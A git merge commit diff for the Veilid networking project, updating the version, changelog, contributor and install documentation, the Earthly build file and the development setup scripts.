Merge remote-tracking branch 'upstream/main'
This commit is contained in:
commit
6831eb37ad
@ -1,5 +1,5 @@
|
||||
[bumpversion]
|
||||
current_version = 0.2.1
|
||||
current_version = 0.2.3
|
||||
|
||||
[bumpversion:file:veilid-server/Cargo.toml]
|
||||
search = name = "veilid-server"
|
||||
|
1
.capnp_version
Normal file
1
.capnp_version
Normal file
@ -0,0 +1 @@
|
||||
1.0.1
|
@ -1,8 +1,4 @@
|
||||
.vscode
|
||||
.git
|
||||
external/keyring-manager/android_test/.gradle
|
||||
external/keyring-manager/android_test/app/build
|
||||
external/keyring-manager/android_test/build
|
||||
external/keyring-manager/android_test/local.properties
|
||||
target
|
||||
veilid-core/pkg
|
||||
|
1
.protoc_version
Normal file
1
.protoc_version
Normal file
@ -0,0 +1 @@
|
||||
24.3
|
16
CHANGELOG.md
16
CHANGELOG.md
@ -1,3 +1,19 @@
|
||||
**Changed in Veilid 0.2.3**
|
||||
- Security fix for WS denial of service
|
||||
- Support for latest Rust 1.72
|
||||
|
||||
**Changed in Veilid 0.2.2**
|
||||
- Capnproto 1.0.1 + Protobuf 24.3
|
||||
- DHT set/get correctness fixes
|
||||
- Connection table fixes
|
||||
- Node resolution fixes
|
||||
- More debugging commands (appmessage, appcall, resolve, better nodeinfo, etc)
|
||||
- Reverse connect for WASM nodes
|
||||
- Better Typescript types for WASM
|
||||
- Various script and environment cleanups
|
||||
- Earthly build for aarch64 RPM
|
||||
- Much improved and faster public address detection
|
||||
|
||||
**Changes in Veilid 0.2.1**
|
||||
- Crates are separated and publishable
|
||||
- First publication of veilid-core with docs to crates.io and docs.rs
|
||||
|
@ -1,8 +1,9 @@
|
||||
# Contributing to Veilid
|
||||
|
||||
Before you get started, please review our [Code of Conduct](./code_of_conduct.md). We're here to make things better and we cannot do that without treating each other with respect.
|
||||
|
||||
|
||||
## Code Contributions
|
||||
|
||||
To begin crafting code to contribute to the Veilid project, first set up a [development environment](./DEVELOPMENT.md). [Fork] and clone the project into your workspace; check out a new local branch and name it in a way that describes the work being done. This is referred to as a [feature branch].
|
||||
|
||||
Some contributions might introduce changes that are incompatible with other existing nodes. In this case it is recommended to also set a development network *Guide Coming Soon*.
|
||||
@ -11,63 +12,60 @@ Once you have added your new function or addressed a bug, test it locally to ens
|
||||
|
||||
We try to consider all merge requests fairly and with attention deserving to those willing to put in time and effort, but if you do not follow these rules, your contribution will be closed. We strive to ensure that the code joining the main branch is written to a high standard.
|
||||
|
||||
|
||||
### Code Contribution Do's & Don'ts:
|
||||
### Code Contribution Do's & Don'ts
|
||||
|
||||
Keeping the following in mind gives your contribution the best chance of landing!
|
||||
|
||||
#### <u>Merge Requests</u>
|
||||
|
||||
* **Do** start by [forking] the project.
|
||||
* **Do** create a [feature branch] to work on instead of working directly on `main`. This helps to:
|
||||
* Protect the process.
|
||||
* Ensures users are aware of commits on the branch being considered for merge.
|
||||
* Allows for a location for more commits to be offered without mingling with other contributor changes.
|
||||
* Allows contributors to make progress while a MR is still being reviewed.
|
||||
* **Do** follow the [50/72 rule] for Git commit messages.
|
||||
* **Do** target your merge request to the **main branch**.
|
||||
* **Do** specify a descriptive title to make searching for your merge request easier.
|
||||
* **Do** list [verification steps] so your code is testable.
|
||||
* **Do** reference associated issues in your merge request description.
|
||||
* **Don't** leave your merge request description blank.
|
||||
* **Don't** abandon your merge request. Being responsive helps us land your code faster.
|
||||
* **Don't** submit unfinished code.
|
||||
|
||||
#### Merge Requests
|
||||
|
||||
- **Do** start by [forking] the project.
|
||||
- **Do** create a [feature branch] to work on instead of working directly on `main`. This helps to:
|
||||
- Protect the process.
|
||||
- Ensures users are aware of commits on the branch being considered for merge.
|
||||
- Allows for a location for more commits to be offered without mingling with other contributor changes.
|
||||
- Allows contributors to make progress while a MR is still being reviewed.
|
||||
- **Do** follow the [50/72 rule] for Git commit messages.
|
||||
- **Do** target your merge request to the **main branch**.
|
||||
- **Do** specify a descriptive title to make searching for your merge request easier.
|
||||
- **Do** list [verification steps] so your code is testable.
|
||||
- **Do** reference associated issues in your merge request description.
|
||||
- **Don't** leave your merge request description blank.
|
||||
- **Don't** abandon your merge request. Being responsive helps us land your code faster.
|
||||
- **Don't** submit unfinished code.
|
||||
|
||||
## Contributions Without Writing Code
|
||||
|
||||
There are numerous ways you can contribute to the growth and success of the Veilid project without writing code:
|
||||
|
||||
- If you want to submit merge requests, begin by [forking] the project and checking out a new local branch. Name your new branch in a way that describes the work being done. This is referred to as a [feature branch].
|
||||
- Submit bugs as well as feature/enhancement requests. Letting us know you found a bug, have an idea for a new feature, or see a way we can enhance existing features is just as important and useful as writing the code related to those things. Send us detailed information about your issue or idea:
|
||||
- Features/Enhancements: Describe your idea. If you're able to, sketch out a diagram or mock-up.
|
||||
- Bugs: Please be sure to include the expected behavior, the observed behavior, and steps to reproduce the problem. Please be descriptive about the environment you've installed your node or application into.
|
||||
- [Help other users with open issues]. Sometimes all an issue needs is a little conversation to clear up a process or misunderstanding. Please keep the [Code of Conduct](./code_of_conduct.md) in mind.
|
||||
- Help other contributors test recently submitted merge requests. By pulling down a merge request and testing it, you can help validate new code contributions for stability and quality.
|
||||
- Report a security or privacy vulnerability. Please let us know if you find ways in which Veilid could handle security and/or privacy in a different or better way. Surely let us know if you find broken or otherwise flawed security and/or privacy functions. You can report these directly to security@veilid.org.
|
||||
- Add or edit documentation. Documentation is a living and evolving library of knowledge. As such, care, feeding, and even pruning is needed from time to time. If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.
|
||||
- If you want to submit merge requests, begin by [forking] the project and checking out a new local branch. Name your new branch in a way that describes the work being done. This is referred to as a [feature branch].
|
||||
- Submit bugs as well as feature/enhancement requests. Letting us know you found a bug, have an idea for a new feature, or see a way we can enhance existing features is just as important and useful as writing the code related to those things. Send us detailed information about your issue or idea:
|
||||
- Features/Enhancements: Describe your idea. If you're able to, sketch out a diagram or mock-up.
|
||||
- Bugs: Please be sure to include the expected behavior, the observed behavior, and steps to reproduce the problem. Please be descriptive about the environment you've installed your node or application into.
|
||||
- [Help other users with open issues]. Sometimes all an issue needs is a little conversation to clear up a process or misunderstanding. Please keep the [Code of Conduct](./code_of_conduct.md) in mind.
|
||||
- Help other contributors test recently submitted merge requests. By pulling down a merge request and testing it, you can help validate new code contributions for stability and quality.
|
||||
- Report a security or privacy vulnerability. Please let us know if you find ways in which Veilid could handle security and/or privacy in a different or better way. Surely let us know if you find broken or otherwise flawed security and/or privacy functions. You can report these directly to <security@veilid.org>.
|
||||
- Add or edit documentation. Documentation is a living and evolving library of knowledge. As such, care, feeding, and even pruning is needed from time to time. If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.
|
||||
|
||||
### Bug Fixes
|
||||
|
||||
#### <u>Bug Fixes</u>
|
||||
* **Do** include reproduction steps in the form of [verification steps].
|
||||
* **Do** link to any corresponding issues in your commit description.
|
||||
- **Do** include reproduction steps in the form of [verification steps].
|
||||
- **Do** link to any corresponding issues in your commit description.
|
||||
|
||||
## Bug Reports
|
||||
|
||||
When reporting Veilid issues:
|
||||
* **Do** write a detailed description of your bug and use a descriptive title.
|
||||
* **Do** include reproduction steps, stack traces, and anything that might help us fix your bug.
|
||||
* **Don't** file duplicate reports. Search open issues for similar bugs before filing a new report.
|
||||
* **Don't** attempt to report issues on a closed PR. New issues should be openned against the `main` branch.
|
||||
|
||||
Please report vulnerabilities in Veilid directly to security@veilid.org.
|
||||
- **Do** write a detailed description of your bug and use a descriptive title.
|
||||
- **Do** include reproduction steps, stack traces, and anything that might help us fix your bug.
|
||||
- **Don't** file duplicate reports. Search open issues for similar bugs before filing a new report.
|
||||
- **Don't** attempt to report issues on a closed PR. New issues should be openned against the `main` branch.
|
||||
|
||||
Please report vulnerabilities in Veilid directly to <security@veilid.org>.
|
||||
|
||||
If you're looking for more guidance, talk to other Veilid contributors on the [Veilid Discord].
|
||||
|
||||
**Thank you** for taking the few moments to read this far! Together we will build something truely remarkable.
|
||||
|
||||
|
||||
|
||||
This contributor guide is inspired by the contribution guidelines of the [Metasploit Framework](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) project found on GitHub.
|
||||
|
||||
[Help other users with open issues]:https://gitlab.com/veilid/veilid/-/issues
|
||||
|
959
Cargo.lock
generated
959
Cargo.lock
generated
File diff suppressed because it is too large
Load Diff
@ -8,6 +8,7 @@ members = [
|
||||
"veilid-wasm",
|
||||
]
|
||||
exclude = ["./external"]
|
||||
resolver = "2"
|
||||
|
||||
[patch.crates-io]
|
||||
cursive = { git = "https://gitlab.com/veilid/cursive.git" }
|
||||
|
@ -1,8 +1,9 @@
|
||||
[![Contributor Covenant](https://img.shields.io/badge/Contributor%20Covenant-2.1-4baaaa.svg)](code_of_conduct.md)
|
||||
|
||||
# Veilid Development
|
||||
|
||||
[![Contributor Covenant](https://img.shields.io/badge/Contributor%20Covenant-2.1-4baaaa.svg)](code_of_conduct.md)
|
||||
|
||||
## Introduction
|
||||
|
||||
This guide covers setting up environments for core, Flutter/Dart, and Python development. See the relevent sections.
|
||||
|
||||
## Obtaining the source code
|
||||
@ -20,14 +21,15 @@ itself, Ubuntu or Mint. Pull requests to support other distributions would be
|
||||
welcome!
|
||||
|
||||
Running the setup script requires:
|
||||
|
||||
* Android SDK and NDK
|
||||
* Rust
|
||||
|
||||
You may decide to use Android Studio [here](https://developer.android.com/studio)
|
||||
to maintain your Android dependencies. If so, use the dependency manager
|
||||
You may decide to use Android Studio [here](https://developer.android.com/studio)
|
||||
to maintain your Android dependencies. If so, use the dependency manager
|
||||
within your IDE. If you plan on using Flutter for Veilid development, the Android Studio
|
||||
method is highly recommended as you may run into path problems with the 'flutter'
|
||||
command line without it. If you do so, you may skip to
|
||||
method is highly recommended as you may run into path problems with the 'flutter'
|
||||
command line without it. If you do so, you may skip to
|
||||
[Run Veilid setup script](#Run Veilid setup script).
|
||||
|
||||
* build-tools;33.0.1
|
||||
@ -38,7 +40,6 @@ command line without it. If you do so, you may skip to
|
||||
|
||||
#### Setup Dependencies using the CLI
|
||||
|
||||
|
||||
You can automatically install the prerequisites using this script:
|
||||
|
||||
```shell
|
||||
@ -88,20 +89,21 @@ cd veilid-flutter
|
||||
./setup_flutter.sh
|
||||
```
|
||||
|
||||
|
||||
### macOS
|
||||
|
||||
Development of Veilid on MacOS is possible on both Intel and ARM hardware.
|
||||
|
||||
Development requires:
|
||||
* Android Studio
|
||||
|
||||
* Android Studio
|
||||
* Xcode, preferably latest version
|
||||
* Homebrew [here](https://brew.sh)
|
||||
* Android SDK and NDK
|
||||
* Rust
|
||||
|
||||
You will need to use Android Studio [here](https://developer.android.com/studio)
|
||||
You will need to use Android Studio [here](https://developer.android.com/studio)
|
||||
to maintain your Android dependencies. Use the SDK Manager in the IDE to install the following packages (use package details view to select version):
|
||||
|
||||
* Android SDK Build Tools (33.0.1)
|
||||
* NDK (Side-by-side) (25.1.8937393)
|
||||
* Cmake (3.22.1)
|
||||
@ -121,7 +123,7 @@ export PATH=\$PATH:$HOME/Library/Android/sdk/platform-tools
|
||||
EOF
|
||||
```
|
||||
|
||||
#### Run Veilid setup script
|
||||
#### Run Veilid setup script (macOS)
|
||||
|
||||
Now you may run the MacOS setup script to check your development environment and
|
||||
pull the remaining Rust dependencies:
|
||||
@ -130,7 +132,7 @@ pull the remaining Rust dependencies:
|
||||
./dev-setup/setup_macos.sh
|
||||
```
|
||||
|
||||
#### Run the veilid-flutter setup script (optional)
|
||||
#### Run the veilid-flutter setup script (optional) (macOS)
|
||||
|
||||
If you are developing Flutter applications or the flutter-veilid portion, you should
|
||||
install Android Studio, and run the flutter setup script:
|
||||
@ -144,13 +146,13 @@ cd veilid-flutter
|
||||
|
||||
For a simple installation allowing Rust development, follow these steps:
|
||||
|
||||
Install Git from https://git-scm.com/download/win
|
||||
Install Git from <https://git-scm.com/download/win>
|
||||
|
||||
Install Rust from https://static.rust-lang.org/rustup/dist/x86_64-pc-windows-msvc/rustup-init.exe
|
||||
Install Rust from <https://static.rust-lang.org/rustup/dist/x86_64-pc-windows-msvc/rustup-init.exe> (this may prompt you to run the Visual Studio Installer, and reboot, before proceeding).
|
||||
|
||||
Ensure that protoc.exe is in a directory in your path. For example, it can be obtained from https://github.com/protocolbuffers/protobuf/releases/download/v24.2/protoc-24.2-win64.zip
|
||||
Ensure that protoc.exe is in a directory in your path. For example, it can be obtained from <https://github.com/protocolbuffers/protobuf/releases/download/v24.3/protoc-24.3-win64.zip>
|
||||
|
||||
Ensure that capnp.exe is in a directory in your path. For example, it can be obtained from https://capnproto.org/capnproto-c++-win32-0.10.4.zip
|
||||
Ensure that capnp.exe (for Cap’n Proto 1.0.1) is in a directory in your path. For example, it can be obtained from the <https://capnproto.org/capnproto-c++-win32-1.0.1.zip> distribution. Please note that the Windows Package Manager Community Repository (i.e., winget) as of 2023-09-15 has version 0.10.4, which is not sufficient.
|
||||
|
||||
Start a Command Prompt window.
|
||||
|
||||
|
36
Earthfile
36
Earthfile
@ -2,7 +2,7 @@ VERSION 0.6
|
||||
|
||||
# Start with older Ubuntu to ensure GLIBC symbol versioning support for older linux
|
||||
# Ensure we are using an amd64 platform because some of these targets use cross-platform tooling
|
||||
FROM ubuntu:16.04
|
||||
FROM ubuntu:18.04
|
||||
|
||||
# Install build prerequisites
|
||||
deps-base:
|
||||
@ -12,14 +12,16 @@ deps-base:
|
||||
# Install Cap'n Proto
|
||||
deps-capnp:
|
||||
FROM +deps-base
|
||||
COPY .capnp_version /
|
||||
COPY scripts/earthly/install_capnproto.sh /
|
||||
RUN /bin/bash /install_capnproto.sh 1; rm /install_capnproto.sh
|
||||
RUN /bin/bash /install_capnproto.sh 1; rm /install_capnproto.sh .capnp_version
|
||||
|
||||
# Install protoc
|
||||
deps-protoc:
|
||||
FROM +deps-capnp
|
||||
COPY .protoc_version /
|
||||
COPY scripts/earthly/install_protoc.sh /
|
||||
RUN /bin/bash /install_protoc.sh; rm /install_protoc.sh
|
||||
RUN /bin/bash /install_protoc.sh; rm /install_protoc.sh .protoc_version
|
||||
|
||||
# Install Rust
|
||||
deps-rust:
|
||||
@ -45,9 +47,6 @@ deps-rust:
|
||||
# Install Linux cross-platform tooling
|
||||
deps-cross:
|
||||
FROM +deps-rust
|
||||
# TODO: gcc-aarch64-linux-gnu is not in the packages for ubuntu 16.04
|
||||
# RUN apt-get install -y gcc-aarch64-linux-gnu curl unzip
|
||||
# RUN apt-get install -y gcc-4.8-arm64-cross
|
||||
RUN curl https://ziglang.org/builds/zig-linux-x86_64-0.11.0-dev.3978+711b4e93e.tar.xz | tar -C /usr/local -xJf -
|
||||
RUN mv /usr/local/zig-linux-x86_64-0.11.0-dev.3978+711b4e93e /usr/local/zig
|
||||
ENV PATH=$PATH:/usr/local/zig
|
||||
@ -74,14 +73,14 @@ deps-linux:
|
||||
# Code + Linux deps
|
||||
code-linux:
|
||||
FROM +deps-linux
|
||||
COPY --dir .cargo files scripts veilid-cli veilid-core veilid-server veilid-tools veilid-flutter veilid-wasm Cargo.lock Cargo.toml /veilid
|
||||
COPY --dir .cargo .capnp_version .protoc_version files scripts veilid-cli veilid-core veilid-server veilid-tools veilid-flutter veilid-wasm Cargo.lock Cargo.toml /veilid
|
||||
RUN cat /veilid/scripts/earthly/cargo-linux/config.toml >> /veilid/.cargo/config.toml
|
||||
WORKDIR /veilid
|
||||
|
||||
# Code + Linux + Android deps
|
||||
code-android:
|
||||
FROM +deps-android
|
||||
COPY --dir .cargo files scripts veilid-cli veilid-core veilid-server veilid-tools veilid-flutter veilid-wasm Cargo.lock Cargo.toml /veilid
|
||||
COPY --dir .cargo .capnp_version .protoc_version files scripts veilid-cli veilid-core veilid-server veilid-tools veilid-flutter veilid-wasm Cargo.lock Cargo.toml /veilid
|
||||
RUN cat /veilid/scripts/earthly/cargo-linux/config.toml >> /veilid/.cargo/config.toml
|
||||
RUN cat /veilid/scripts/earthly/cargo-android/config.toml >> /veilid/.cargo/config.toml
|
||||
WORKDIR /veilid
|
||||
@ -216,6 +215,27 @@ package-linux-arm64-deb:
|
||||
# save artifacts
|
||||
SAVE ARTIFACT --keep-ts /dpkg/out/*.deb AS LOCAL ./target/packages/
|
||||
|
||||
package-linux-arm64-rpm:
|
||||
FROM --platform arm64 rockylinux:8
|
||||
RUN yum install -y createrepo rpm-build rpm-sign yum-utils rpmdevtools
|
||||
RUN rpmdev-setuptree
|
||||
#################################
|
||||
### RPMBUILD .RPM FILES
|
||||
#################################
|
||||
RUN mkdir -p /veilid/target
|
||||
COPY --dir .cargo files scripts veilid-cli veilid-core veilid-server veilid-tools veilid-flutter veilid-wasm Cargo.lock Cargo.toml package /veilid
|
||||
COPY +build-linux-arm64/aarch64-unknown-linux-gnu /veilid/target/aarch64-unknown-linux-gnu
|
||||
RUN mkdir -p /rpm-work-dir/veilid-server
|
||||
# veilid-server
|
||||
RUN veilid/package/rpm/veilid-server/earthly_make_veilid_server_rpm.sh aarch64 aarch64-unknown-linux-gnu
|
||||
#SAVE ARTIFACT --keep-ts /root/rpmbuild/RPMS/aarch64/*.rpm AS LOCAL ./target/packages/
|
||||
# veilid-cli
|
||||
RUN veilid/package/rpm/veilid-cli/earthly_make_veilid_cli_rpm.sh aarch64 aarch64-unknown-linux-gnu
|
||||
# save artifacts
|
||||
SAVE ARTIFACT --keep-ts /root/rpmbuild/RPMS/aarch64/*.rpm AS LOCAL ./target/packages/
|
||||
|
||||
|
||||
|
||||
package-linux-amd64:
|
||||
BUILD +package-linux-amd64-deb
|
||||
BUILD +package-linux-amd64-rpm
|
||||
|
82
INSTALL.md
82
INSTALL.md
@ -1,61 +1,99 @@
|
||||
# Install a Veilid Node
|
||||
|
||||
# Install and run a Veilid Node
|
||||
|
||||
## Server Grade Headless Nodes
|
||||
|
||||
|
||||
These network support nodes are heavier than the node a user would establish on their phone in the form of a chat or social media application. A cloud based virtual private server (VPS), such as Digital Ocean Droplets or AWS EC2, with high bandwidth, processing resources, and uptime availability is crucial for building the fast, secure, and private routing that Veilid is built to provide.
|
||||
|
||||
## Install
|
||||
|
||||
### Add the repo to a Debian based system and install a Veilid node
|
||||
This is a multi-step process.
|
||||
### Debian
|
||||
|
||||
Follow the steps here to add the repo to a Debian based system and install Veilid.
|
||||
|
||||
**Step 1**: Add the GPG keys to your operating systems keyring.<br />
|
||||
*Explanation*: The `wget` command downloads the public key, and the `sudo gpg` command adds the public key to the keyring.
|
||||
|
||||
```shell
|
||||
wget -O- https://packages.veilid.net/gpg/veilid-packages-key.public | sudo gpg --dearmor -o /usr/share/keyrings/veilid-packages-keyring.gpg
|
||||
```
|
||||
|
||||
**Step 2**: Identify your architecture<br />
|
||||
*Explanation*: The following command will tell you what type of CPU your system is running
|
||||
|
||||
```shell
|
||||
dpkg --print-architecture
|
||||
```
|
||||
|
||||
**Step 3**: Add Veilid to your list of available software.<br />
|
||||
*Explanation*: Using the command in **Step 2** you will need to run **one** of the following:
|
||||
*Explanation*: Use the result of your command in **Step 2** and run **one** of the following:
|
||||
|
||||
- For **AMD64** based systems run this command:
|
||||
```shell
|
||||
echo "deb [arch=amd64 signed-by=/usr/share/keyrings/veilid-packages-keyring.gpg] https://packages.veilid.net/apt stable main" | sudo tee /etc/apt/sources.list.d/veilid.list 1>/dev/null
|
||||
```
|
||||
|
||||
```shell
|
||||
echo "deb [arch=amd64 signed-by=/usr/share/keyrings/veilid-packages-keyring.gpg] https://packages.veilid.net/apt stable main" | sudo tee /etc/apt/sources.list.d/veilid.list 1>/dev/null
|
||||
```
|
||||
|
||||
- For **ARM64** based systems run this command:
|
||||
```shell
|
||||
echo "deb [arch=arm64 signed-by=/usr/share/keyrings/veilid-packages-keyring.gpg] https://packages.veilid.net/apt stable main" | sudo tee /etc/apt/sources.list.d/veilid.list 1>/dev/null
|
||||
```
|
||||
|
||||
```shell
|
||||
echo "deb [arch=arm64 signed-by=/usr/share/keyrings/veilid-packages-keyring.gpg] https://packages.veilid.net/apt stable main" | sudo tee /etc/apt/sources.list.d/veilid.list 1>/dev/null
|
||||
```
|
||||
|
||||
*Explanation*:
|
||||
Each of the above commands will create a new file called `veilid.list` in the `/etc/apt/sources.list.d/`. This file contains instructions that tell the operating system where to download Veilid.
|
||||
|
||||
**Step 4**: Refresh the package manager.<br />
|
||||
*Explanation*: This tells the `apt` package manager to rebuild the list of available software using the files in `/etc/apt/sources.list.d/` directory. This is invoked with "sudo" to grant superuser permission to make the changes.
|
||||
*Explanation*: This tells the `apt` package manager to rebuild the list of available software using the files in `/etc/apt/sources.list.d/` directory.
|
||||
|
||||
```shell
|
||||
sudo apt update
|
||||
```
|
||||
|
||||
**Step 5**: Install Veilid.<br />
|
||||
*Explanation*: With the package manager updated, it is now possible to install Veilid! This is invoked with "sudo" to grant superuser permission to make the changes.
|
||||
**Step 5**: Install Veilid.
|
||||
|
||||
```shell
|
||||
sudo apt install veilid-server veilid-cli
|
||||
```
|
||||
|
||||
### Add the repo to a Fedora based system and install a Veilid node
|
||||
**Step 1**: Add Veilid to your list of available software.<br />
|
||||
*Explanation*: With the package manager updated, it is now possible to install Veilid!
|
||||
### RPM-based
|
||||
|
||||
Follow the steps here to add the repo to
|
||||
RPM-based systems (CentOS, Rocky Linux, AlmaLinux, Fedora, etc.)
|
||||
and install Veilid.
|
||||
|
||||
**Step 1**: Add Veilid to your list of available software.
|
||||
|
||||
```shell
|
||||
yum-config-manager --add-repo https://packages.veilid.net/rpm/veilid-rpm-repo.repo
|
||||
sudo yum-config-manager --add-repo https://packages.veilid.net/rpm/veilid-rpm-repo.repo
|
||||
```
|
||||
**Step 2**: Install Veilid.<br />
|
||||
*Explanation*: With the package manager updated, it is now possible to install Veilid!
|
||||
**Step 2**: Install Veilid.
|
||||
|
||||
```shell
|
||||
dnf install veilid-server veilid-cli
|
||||
sudo dnf install veilid-server veilid-cli
|
||||
```
|
||||
|
||||
## Start headless node
|
||||
|
||||
### With systemd
|
||||
|
||||
To start a headless Veilid node, run:
|
||||
|
||||
```shell
|
||||
sudo systemctl start veilid-server.service
|
||||
```
|
||||
|
||||
To have your headless Veilid node start at boot:
|
||||
|
||||
```shell
|
||||
sudo systemctl enable --now veilid-server.service
|
||||
```
|
||||
|
||||
### Without systemd
|
||||
|
||||
`veilid-server` must be run as the `veilid` user.
|
||||
|
||||
To start your headless Veilid node without systemd, run:
|
||||
|
||||
```shell
|
||||
sudo -u veilid veilid-server
|
||||
```
|
||||
|
22
README-DE.md
22
README-DE.md
@ -1,8 +1,8 @@
|
||||
# Willkommen bei Veilid
|
||||
|
||||
- [Aus der Umlaufbahn](#aus-der-umlaufbahn)
|
||||
- [Betreibe einen Node](#betreibe-einen-node)
|
||||
- [Entwicklung](#entwicklung)
|
||||
- [Aus der Umlaufbahn](#aus-der-umlaufbahn)
|
||||
- [Betreibe einen Node](#betreibe-einen-node)
|
||||
- [Entwicklung](#entwicklung)
|
||||
|
||||
## Aus der Umlaufbahn
|
||||
|
||||
@ -13,17 +13,19 @@ Veilid wurde mit der Idee im Hinterkopf entworfen, dass jeder Benutzer seine eig
|
||||
Der primäre Zweck des Veilid Netzwerks ist es eine Infrastruktur für eine besondere Art von geteilten Daten zur Verfügung zu stellen: Soziale Medien in verschiedensten Arten. Dies umfasst sowohl leichtgewichtige Inhalte wie Twitters/Xs Tweets oder Mastodons Toots, mittleschwere Inhalte wie Bilder oder Musik aber auch schwergewichtige Inhalte wie Videos. Es ist eben so beabsichtigt Meta-Inhalte (wie persönliche Feeds, Antworten, private Nachrichten und so weiter) auf Basis von Veilid laufen zu lassen.
|
||||
|
||||
## Betreibe einen Node
|
||||
|
||||
Der einfachste Weg dem Veilid Netzwerk beim Wachsen zu helfen ist einen eigenen Node zu betreiben. Jeder Benutzer von Veilid ist automatisch ein Node, aber einige Nodes helfen dem Netzwerk mehr als Andere. Diese Nodes, die das Netzwerk unterstützen sind schwergewichtiger als Nodes, die Nutzer auf einem Smartphone in Form eine Chats oder eine Social Media Applikation starten würde.Droplets oder AWS EC2 mit hoher Bandbreite, Verarbeitungsressourcen und Verfügbarkeit sind wesentlich um das schnellere, sichere und private Routing zu bauen, das Veilid zur Verfügung stellen soll.
|
||||
|
||||
Um einen solchen Node zu betreiben, setze einen Debian- oder Fedora-basierten Server auf und installiere den veilid-server Service. Um dies besonders einfach zu machen, stellen wir Paketmanager Repositories als .deb und .rpm Pakete bereit. Für weitergehendene Information schaue in den [Installation](./INSTALL.md) Leitfaden.
|
||||
|
||||
## Entwicklung
|
||||
|
||||
Falls Du Lust hast, dich an der Entwicklung von Code oder auch auf andere Weise zu beteiligen, schau bitte in den [Mitmachen](./CONTRIBUTING.md) Leitfaden. Wir sind bestrebt dieses Projekt offen zu entwickeln und zwar von Menschen für Menschen. Spezifische Bereiche in denen wir nach Hilfe suchen sind:
|
||||
|
||||
* Rust
|
||||
* Flutter/Dart
|
||||
* Python
|
||||
* Gitlab DevOps und CI/CD
|
||||
* Dokumentation
|
||||
* Sicherheitsprüfungen
|
||||
* Linux Pakete
|
||||
- Rust
|
||||
- Flutter/Dart
|
||||
- Python
|
||||
- Gitlab DevOps und CI/CD
|
||||
- Dokumentation
|
||||
- Sicherheitsprüfungen
|
||||
- Linux Pakete
|
||||
|
22
README.md
22
README.md
@ -1,8 +1,8 @@
|
||||
# Welcome to Veilid
|
||||
|
||||
- [From Orbit](#from-orbit)
|
||||
- [Run a Node](#run-a-node)
|
||||
- [Development](#development)
|
||||
- [From Orbit](#from-orbit)
|
||||
- [Run a Node](#run-a-node)
|
||||
- [Development](#development)
|
||||
|
||||
## From Orbit
|
||||
|
||||
@ -13,17 +13,19 @@ Veilid is designed with a social dimension in mind, so that each user can have t
|
||||
The primary purpose of the Veilid network is to provide the infrastructure for a specific kind of shared data: social media in various forms. That includes light-weight content such as Twitter's tweets or Mastodon's toots, medium-weight content like images and songs, and heavy-weight content like videos. Meta-content such as personal feeds, replies, private messages, and so forth are also intended to run atop Veilid.
|
||||
|
||||
## Run a Node
|
||||
|
||||
The easiest way to help grow the Veilid network is to run your own node. Every user of Veilid is a node, but some nodes help the network more than others. These network support nodes are heavier than the node a user would establish on their phone in the form of a chat or social media application. A cloud based virtual private server (VPS), such as Digital Ocean Droplets or AWS EC2, with high bandwidth, processing resources, and up time availability is crucial for building the fast, secure, and private routing that Veilid is built to provide.
|
||||
|
||||
To run such a node, establish a Debian or Fedora based VPS and install the veilid-server service. To make this process simple we are hosting package manager repositories for .deb and .rpm packages. See the [installing](./INSTALL.md) guide for more information.
|
||||
|
||||
## Development
|
||||
|
||||
If you're inclined to get involved in code and non-code development, please check out the [contributing](./CONTRIBUTING.md) guide. We're striving for this project to be developed in the open and by people for people. Specific areas in which we are looking for help include:
|
||||
|
||||
* Rust
|
||||
* Flutter/Dart
|
||||
* Python
|
||||
* Gitlab DevOps and CI/CD
|
||||
* Documentation
|
||||
* Security reviews
|
||||
* Linux packaging
|
||||
- Rust
|
||||
- Flutter/Dart
|
||||
- Python
|
||||
- Gitlab DevOps and CI/CD
|
||||
- Documentation
|
||||
- Security reviews
|
||||
- Linux packaging
|
||||
|
@ -9,7 +9,7 @@ fi
|
||||
if [ ! -z "$(command -v apt)" ]; then
|
||||
# Install APT dependencies
|
||||
sudo apt update -y
|
||||
sudo apt install -y openjdk-11-jdk-headless iproute2 curl build-essential cmake libssl-dev openssl file git pkg-config libdbus-1-dev libdbus-glib-1-dev libgirepository1.0-dev libcairo2-dev checkinstall unzip llvm wabt
|
||||
sudo apt install -y openjdk-11-jdk-headless iproute2 curl build-essential cmake libssl-dev openssl file git pkg-config libdbus-1-dev libdbus-glib-1-dev libgirepository1.0-dev libcairo2-dev checkinstall unzip llvm wabt python3-pip
|
||||
elif [ ! -z "$(command -v dnf)" ]; then
|
||||
# DNF (formerly yum)
|
||||
sudo dnf update -y
|
||||
|
@ -1,6 +1,11 @@
|
||||
#!/bin/bash
|
||||
set -eo pipefail
|
||||
|
||||
if [ $(id -u) -eq 0 ]; then
|
||||
echo "Don't run this as root"
|
||||
exit
|
||||
fi
|
||||
|
||||
SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
|
||||
|
||||
if [[ "$(uname)" != "Linux" ]]; then
|
||||
@ -109,7 +114,7 @@ fi
|
||||
rustup target add aarch64-linux-android armv7-linux-androideabi i686-linux-android x86_64-linux-android wasm32-unknown-unknown
|
||||
|
||||
# install cargo packages
|
||||
cargo install wasm-bindgen-cli wasm-pack
|
||||
cargo install wasm-bindgen-cli wasm-pack cargo-edit
|
||||
|
||||
# install pip packages
|
||||
pip3 install --upgrade bumpversion
|
||||
|
@ -139,7 +139,7 @@ esac
|
||||
rustup target add aarch64-apple-darwin aarch64-apple-ios aarch64-apple-ios-sim x86_64-apple-darwin x86_64-apple-ios wasm32-unknown-unknown aarch64-linux-android armv7-linux-androideabi i686-linux-android x86_64-linux-android
|
||||
|
||||
# install cargo packages
|
||||
cargo install wasm-bindgen-cli wasm-pack
|
||||
cargo install wasm-bindgen-cli wasm-pack cargo-edit
|
||||
|
||||
# install pip packages
|
||||
pip3 install --upgrade bumpversion
|
||||
|
@ -21,8 +21,8 @@ IF NOT DEFINED PROTOC_FOUND (
|
||||
|
||||
FOR %%X IN (capnp.exe) DO (SET CAPNP_FOUND=%%~$PATH:X)
|
||||
IF NOT DEFINED CAPNP_FOUND (
|
||||
echo capnproto compiler ^(capnp^) is required but it's not installed. Install capnp 0.10.4 or higher. Ensure it is in your path. Aborting.
|
||||
echo capnp is available here: https://capnproto.org/capnproto-c++-win32-0.10.4.zip
|
||||
